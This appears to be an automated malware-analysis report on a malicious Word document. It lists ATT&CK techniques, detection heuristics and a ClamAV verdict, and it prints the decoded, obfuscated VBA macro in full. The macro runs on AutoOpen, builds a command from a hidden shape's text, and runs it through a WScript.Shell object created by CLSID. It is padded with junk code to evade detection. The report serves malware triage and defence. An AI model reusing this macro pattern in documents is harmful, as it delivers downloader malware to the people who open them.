MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.003 Windows Command Shell
T1203 Exploitation for Client Execution
The sample contains VBA macros that are designed to execute obfuscated commands via cmd.exe. Specifically, the AutoOpen macro attempts to construct and run a complex command string that appears to download and execute a second-stage payload. The use of WScript.Shell CLSID further indicates malicious intent to interact with the system.
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6775323-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6775323-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6806 bytes |
SHA-256: 59096927f01063a6d531abc24a0efba110199dbba5e8d713edde060972cd362e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
109 of 163 identifiers look randomly generated (e.g. 'NarmvINMqnkL') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "qLWJVzw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case EdnbV
Case 171915710
Hmozd = 252445714
vKITZfT = CLng(53884184)
Case 32346758
zsUGkILW = Oct(PQKIKvSBC)
QqKmAppSm = diwYDbcG
Case 320116756
idbkWKk = CDate(zYGiR)
otpFTQ = Int(307001358 * ZjPjUlEiS)
End Select
On Error Resume Next
Select Case pwQwHwzdR
Case 147208844
mQMuHBZw = 276619519
RjWXGq = CLng(249665415)
Case 90566389
jBDlYYO = Oct(iifWOcKcJ)
JFWhnFj = NtaBHLP
Case 304863865
jiinVtHu = CDate(KrCHMv)
MbIACOwBA = Int(75997176 * TdWTHUp)
End Select
Set iNnPa = Shapes("NarmvINMqnkL")
On Error Resume Next
Select Case uaZBYjXFa
Case 2309754
pFHla = 205503100
kfYiITV = CLng(129520066)
Case 291203322
FaAwDSLU = Oct(lfQGI)
dHRPES = jMQOYMRF
Case 207604940
rkAzz = CDate(mnvRZ)
zUYPTfMDE = Int(263971796 * Pqoiouw)
End Select
cYarBTAmPGi = "" + fcIAP + wpJtlt + aYWIO + DPkJK + iNnPa.TextFrame.TextRange.Text + szOfnWvB + BLYbf
On Error Resume Next
Select Case bwCDpzB
Case 46729088
iOYKDUS = 154742898
BVcLLdXR = CLng(210548936)
Case 12300487
OzboO = Oct(WAAEh)
ihROR = lpWAZccz
Case 105486520
ZfYTzzPi = CDate(kwzwRWkU)
witOGj = Int(305416970 * lNawMR)
End Select
On Error Resume Next
Select Case Whjlq
Case 342307649
DsQwrp = 129312861
PimJGi = CLng(193695721)
Case 94406064
kCBfZlX = Oct(qRQjSTwXN)
UaFMQ = CwXBPrbsS
Case 49718789
nwldG = CDate(wBXDkzPnl)
ZIoXXlKdd = Int(92171677 * kzqXNKS)
End Select
On Error Resume Next
Select Case hPwhkLi
Case 111619465
TaBzMnzh = 272522927
bSoGsvat = CLng(136070643)
Case 270553890
zNjCM = Oct(JDBmZbQ)
ivdhu = BuEQC
Case 297611781
GmKRN = CDate(jWMUuzS)
dnwCrYzK = Int(338806946 * LanzDJQAT)
End Select
Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
On Error Resume Next
Select Case hNILcORwj
Case 272614853
iPEBQiVV = 110422557
IXJpcq = CLng(192569596)
Case 45411639
fKhua = Oct(WpShWM)
JMJLuG = VjnufZq
Case 338584135
AYnpiKZ = CDate(Udjtp)
otCuN = Int(321273322 * RvWkfvXn)
End Select
On Error Resume Next
Select Case niKHWz
Case 62712291
TQjUBr = 299574856
mjzzwP = CLng(28373123)
Case 133794171
ZzFZrHkb = Oct(ziAlnX)
WTwUaBaO = szUJMY
Case 175096216
awAEqbJws = CDate(sLKBsbMbw)
zGYXq = Int(54366830 * JPSzbHKKq)
End Select
On Error Resume Next
Select Case TqSuVzPp
Case 254953312
SRzFA = 18554173
ToXFNuKo = CLng(174765228)
Case 214726531
vMFcRRj = Oct(jJHwp)
qSuXnvG = hBabj
Case 44710062
IFvQtuZAq = CDate(iZATiMpif)
bPRmkOt = Int(204209981 * CqkZE)
End Select
On Error Resume Next
Select Case ILHuLLkSf
Case 35205140
XWQJQwWn = 95169026
AtrnN = CLng(51610355)
Case 130353324
zVZwREj = Oct(QStXnW)
wLDYzUWF = wqISPHwD
Case 112630638
fjPbELcBj = CDate(urSdL)
cJiUFdQrz = Int(179830947 * OzJTpGwqw)
End Select
Const wMizh = 0
On Error Resume Next
Select Case rFitF
Case 69091941
CImbX = 64553337
UEOAaa = CLng(117841373)
Case 256185431
OkQhQWAo = Oct(ThKAoRPHS)
wzQQiZKpJ = iLlEaUIoc
Case 254955387
IzjEcGUP = CDate(lTIRqhwUm)
FhrrR = Int(47664962 * FZUIaifTn)
End Select
On Error Resume Next
Select Case wPYnm
Case 153911123
UfjfS = 111806296
klvkoQG = CLng(78309060)
Case 316795503
pzNNtR = Oct(zRwFz)
aSEGBpA = sOpdX
Case 184530810
piAmTEzpJ = CDate(bNbfASVl)
VRjKF = Int(146015791 * SwiYjVpRK)
End Select
SKNLli.Run! cYarBTAmPGi, wMizh
On Error Resume Next
Select Case PuhqtZM
Case 99214300
wvzkicV = 303259403
CjINH = CLng(288308409)
Case 118798962
wYYaIh = Oct(NLBSQ)
bGQfpzpUm = msKuS
Case 100331047
mqYhb = CDate(qDpOzWTa)
dNaZs = Int(226264793 * tcrLRm)
End Select
On Error Resume Next
Select Case FEcrjzVY
Case 68880352
VWtVOWSwi = 159733432
XZVLL = CLng(50446225)
Case 204684516
iTqmaJ = Oct(DIOvSmdfc)
nsuMWRcG = iiGfUrp
Case 31625011
iijTMVSJ = CDate(jFOtusfX)
kGIBNf = Int(314139097 * OzctEch)
End Select
On Error Resume Next
Select Case SGSKm
Case 298416984
kESCTnbpu = 207580043
TjwWHJIYZ = CLng(59435681)
Case 137644640
cssnE = Oct(BmJzXl)
CoHdzUQwr = sKvwJBOU
Case 232688174
zqJbAW = CDate(ttlWLKW)
VBuco = Int(26556528 * lJzcIO)
End Select
On Error Resume Next
Select Case HjwSdjVD
Case 247477994
ltJQHiE = 34883385
fVuOTK = CLng(62508234)
Case 31716602
wiCqw = Oct(iYDItirw)
PHcjElL = LpQLNS
Case 187534503
UiUEH = CDate(vviljbv)
hnWYwL = Int(221072836 * AOnNqAh)
End Select
On Error Resume Next
Select Case XjaYisz
Case 311681866
ZfuOYk = 306694237
TSuutlcKv = CLng(166535911)
Case 292192121
clEtD = Oct(wUULp)
mtnPX = FuqmQ
Case 62710060
jizwO = CDate(TEvqnaAK)
naXIdo = Int(51301277 * wMmqTzJpU)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.